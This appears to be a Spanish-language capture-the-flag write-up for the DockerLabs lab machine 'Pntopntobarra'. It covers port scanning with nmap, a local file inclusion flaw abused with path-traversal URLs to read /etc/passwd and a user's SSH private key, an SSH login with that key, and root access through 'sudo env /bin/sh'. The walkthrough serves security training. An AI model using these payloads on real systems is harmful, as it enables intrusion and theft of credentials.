miguel@home:~$

Pntopntobarra - DockerLabs

OS Dificultad Creator
Linux Fácil maciiii___

Reconocimiento

Comenzamos el proceso de reconocimiento identificando los puertos abiertos en el sistema objetivo.

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG ports 
  • -p-: Escanea todos los puertos (1-65535).
  • --open: Solo muestra los puertos abiertos.
  • -sS: Realiza un escaneo SYN, que es rápido y discreto.
  • --min-rate=5000: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.
  • -n: No realiza resolución DNS.
  • -Pn: No realiza ping previo para determinar si el host está activo.
  • -vvv: Muestra resultados detallados y en tiempo real.

image

Durante el escaneo, descubrimos que los siguientes puertos están activos:

  • 22 (SSH)
  • 80 (HTTP) A continuación, evaluamos si los puertos abiertos presentan alguna vulnerabilidad, además de obtener más información sobre los servicios asociados a esos puertos.
    nmap -p22,80 -sCV 172.17.0.2 -oG targeted
    

    image

Exploración Web

Accedemos al puerto 80 y encontramos una página web con un mensaje de advertencia y dos botones: “Hacer clic aquí podría empeorar la situación” y “Ejemplos de computadoras infectadas”.

image

Al probar con esa ruta, el archivo se carga sin problemas, lo cual indica que posiblemente estamos ante una vulnerabilidad LFI (Local File Inclusion). Esto permite incluir archivos locales en el servidor al manipular el parámetro images.

image

Para confirmar, intentamos leer el archivo /etc/passwd, que lista los usuarios en el sistema:

image

http://172.17.0.2/ejemplos.php?images=./../../../etc/passwd

image

Vamos a ver que mas podemos hacer , ya que el puerto 22 esta abierto vamos a ver si podemos sacar el .ssh de algun usuario.

image

Intrusion

Descubrimos el usuario nico en /etc/passwd. Dado que el puerto 22 está abierto, intentamos obtener la clave SSH privada (id_rsa) de nico para acceder al sistema como él. El archivo id_rsa en .ssh contiene una clave privada que permite autenticación SSH sin contraseña.

Intentamos cargar el archivo de clave privada con LFI:

http://172.17.0.2/ejemplos.php?images=./../../../home/nico/.ssh/id_rsa

image

Copiamos el contenido del archivo id_rsa en nuestra máquina y le damos permisos adecuados antes de conectarnos:

chmod 600 id_rsa
ssh -i id_rsa nico@172.17.0.2                      

Esto nos da acceso al sistema como el usuario nico.

image

Escalada de Privilegios.

Al ejecutar sudo -l, notamos que tiene permisos para ejecutar env como root.Utilizando GTFOBins sabemos cómo explotar estos binarios.

image

Ejecutamos el siguiente comando para obtener una shell con privilegios de root:

sudo env /bin/sh

Al ejecutar este comando, accedemos como root.

image